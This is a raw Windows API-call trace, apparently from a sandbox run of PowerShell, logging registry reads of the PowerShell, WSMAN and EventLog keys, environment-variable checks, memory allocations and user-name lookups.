	[0547.197] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0547.198] SetErrorMode (uMode=0x1) returned 0x1
	[0547.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0547.198] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x324) returned 0x0
	[0547.198] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0547.198] CoTaskMemAlloc (cb=0x5a) returned 0x3f9870
	[0547.198] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x3f9870, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0547.198] CoTaskMemFree (pv=0x3f9870) 
	[0547.198] RegCloseKey (hKey=0x324) returned 0x0
	[0547.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0547.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0547.199] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x838545fd, Data2=0xec84, Data3=0x47bc, Data4=([0]=0xb9, [1]=0x11, [2]=0x8f, [3]=0x8c, [4]=0xfa, [5]=0x1e, [6]=0xda, [7]=0xde))) returned 0x0
	[0547.199] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xbb57d3d5, Data2=0x732c, Data3=0x442e, Data4=([0]=0x82, [1]=0xcc, [2]=0x1a, [3]=0xcb, [4]=0x7e, [5]=0x5, [6]=0xd0, [7]=0x34))) returned 0x0
	[0547.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0547.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0547.235] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0547.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.237] CoTaskMemFree (pv=0x3e2f10) 
	[0548.255] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0548.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.255] CoTaskMemFree (pv=0x3e2f10) 
	[0548.256] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0548.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0548.257] CoTaskMemFree (pv=0x3e2f10) 
	[0549.296] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0549.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.296] CoTaskMemFree (pv=0x3e2f10) 
	[0549.307] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0549.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.307] CoTaskMemFree (pv=0x3e2f10) 
	[0549.313] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0549.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.313] CoTaskMemFree (pv=0x3e2f10) 
	[0549.314] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0549.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.314] CoTaskMemFree (pv=0x3e2f10) 
	[0549.321] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd458 | out: phkResult=0x1cd458*=0x324) returned 0x0
	[0549.324] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd35c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd358, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd35c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd358*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0549.324] CoTaskMemFree (pv=0x0) 
	[0549.325] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0549.325] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x3a4cf0, lpcchValueName=0x1cd408, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd408, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0549.325] CoTaskMemFree (pv=0x3a4cf0) 
	[0549.325] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0549.325] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x3a4cf0, lpcchValueName=0x1cd408, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd408, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0549.325] CoTaskMemFree (pv=0x3a4cf0) 
	[0549.325] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0549.325] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x3a4cf0, lpcchValueName=0x1cd408, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd408, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0549.325] CoTaskMemFree (pv=0x3a4cf0) 
	[0549.348] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd3ec, lpData=0x0, lpcbData=0x1cd3e8*=0x0 | out: lpType=0x1cd3ec*=0x1, lpData=0x0, lpcbData=0x1cd3e8*=0x8) returned 0x0
	[0549.348] CoTaskMemAlloc (cb=0xc) returned 0x1b7a6c30
	[0549.348] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd3bc, lpData=0x1b7a6c30, lpcbData=0x1cd3b8*=0x8 | out: lpType=0x1cd3bc*=0x1, lpData="2.0", lpcbData=0x1cd3b8*=0x8) returned 0x0
	[0549.348] CoTaskMemFree (pv=0x1b7a6c30) 
	[0555.070] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3a8 | out: phkResult=0x1cd3a8*=0x324) returned 0x0
	[0555.070] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd2ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd2a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd2ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd2a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.070] CoTaskMemFree (pv=0x0) 
	[0555.070] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.070] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x3a4cf0, lpcchValueName=0x1cd358, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd358, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0555.070] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.070] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.070] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x3a4cf0, lpcchValueName=0x1cd358, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd358, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0555.070] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.070] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.070] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x3a4cf0, lpcchValueName=0x1cd358, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd358, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0555.070] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.071] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd33c, lpData=0x0, lpcbData=0x1cd338*=0x0 | out: lpType=0x1cd33c*=0x1, lpData=0x0, lpcbData=0x1cd338*=0x8) returned 0x0
	[0555.071] CoTaskMemAlloc (cb=0xc) returned 0x1b7a6bb0
	[0555.071] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd30c, lpData=0x1b7a6bb0, lpcbData=0x1cd308*=0x8 | out: lpType=0x1cd30c*=0x1, lpData="2.0", lpcbData=0x1cd308*=0x8) returned 0x0
	[0555.071] CoTaskMemFree (pv=0x1b7a6bb0) 
	[0555.072] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0555.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.072] CoTaskMemFree (pv=0x3e2f10) 
	[0555.076] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0555.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.076] CoTaskMemFree (pv=0x3e2f10) 
	[0555.080] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3d8 | out: phkResult=0x1cd3d8*=0x2f8) returned 0x0
	[0555.084] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd34c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd348, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd34c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd348*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.084] CoTaskMemFree (pv=0x0) 
	[0555.085] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.085] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x0, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.085] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.085] CoTaskMemFree (pv=0x0) 
	[0555.085] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.085] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x1, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.085] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.085] CoTaskMemFree (pv=0x0) 
	[0555.085] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.085] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x2, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.085] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.085] CoTaskMemFree (pv=0x0) 
	[0555.085] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.085] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x3, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.085] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.085] CoTaskMemFree (pv=0x0) 
	[0555.085] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.085] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x4, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.086] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.086] CoTaskMemFree (pv=0x0) 
	[0555.086] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.086] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x5, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.086] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.086] CoTaskMemFree (pv=0x0) 
	[0555.086] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.086] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x6, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.086] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.086] CoTaskMemFree (pv=0x0) 
	[0555.086] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.086] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x7, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.086] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.086] CoTaskMemFree (pv=0x0) 
	[0555.086] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0555.086] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x8, lpName=0x3a4cf0, lpcchName=0x1cd3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0555.086] CoTaskMemFree (pv=0x3a4cf0) 
	[0555.086] CoTaskMemFree (pv=0x0) 
	[0555.086] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x2fc) returned 0x0
	[0555.086] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x0) returned 0x2
	[0555.086] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x300) returned 0x0
	[0555.086] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x0) returned 0x2
	[0555.086] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x1c4) returned 0x0
	[0555.087] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x0) returned 0x2
	[0555.087] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x328) returned 0x0
	[0555.087] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x0) returned 0x2
	[0555.087] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x32c) returned 0x0
	[0555.087] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x0) returned 0x2
	[0555.087] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x330) returned 0x0
	[0555.087] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x0) returned 0x2
	[0555.087] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x334) returned 0x0
	[0555.087] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x0) returned 0x2
	[0555.087] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x338) returned 0x0
	[0555.087] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x0) returned 0x2
	[0555.087] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x33c) returned 0x0
	[0555.088] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x340) returned 0x0
	[0555.088] RegCloseKey (hKey=0x340) returned 0x0
	[0555.088] RegCloseKey (hKey=0x2f8) returned 0x0
	[0555.089] RegCloseKey (hKey=0x33c) returned 0x0
	[0555.100] CoTaskMemAlloc (cb=0x804) returned 0x1b7d2b70
	[0555.100] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d2b70, nSize=0x1cd648 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd648) returned 0x1
	[0557.064] CoTaskMemFree (pv=0x1b7d2b70) 
	[0557.065] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0557.066] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd688 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd688) returned 1
	[0557.066] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.052] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd388 | out: phkResult=0x1cd388*=0x30c) returned 0x0
	[0559.053] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd2fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd2f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd2fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd2f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.053] CoTaskMemFree (pv=0x0) 
	[0559.053] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.053] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.053] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.053] CoTaskMemFree (pv=0x0) 
	[0559.053] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.053] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.053] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.053] CoTaskMemFree (pv=0x0) 
	[0559.053] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.054] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.054] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.054] CoTaskMemFree (pv=0x0) 
	[0559.054] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.054] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.054] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.054] CoTaskMemFree (pv=0x0) 
	[0559.054] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.054] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.054] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.054] CoTaskMemFree (pv=0x0) 
	[0559.054] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.054] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.054] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.054] CoTaskMemFree (pv=0x0) 
	[0559.054] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.054] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.054] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.054] CoTaskMemFree (pv=0x0) 
	[0559.054] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.054] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.054] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.054] CoTaskMemFree (pv=0x0) 
	[0559.054] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
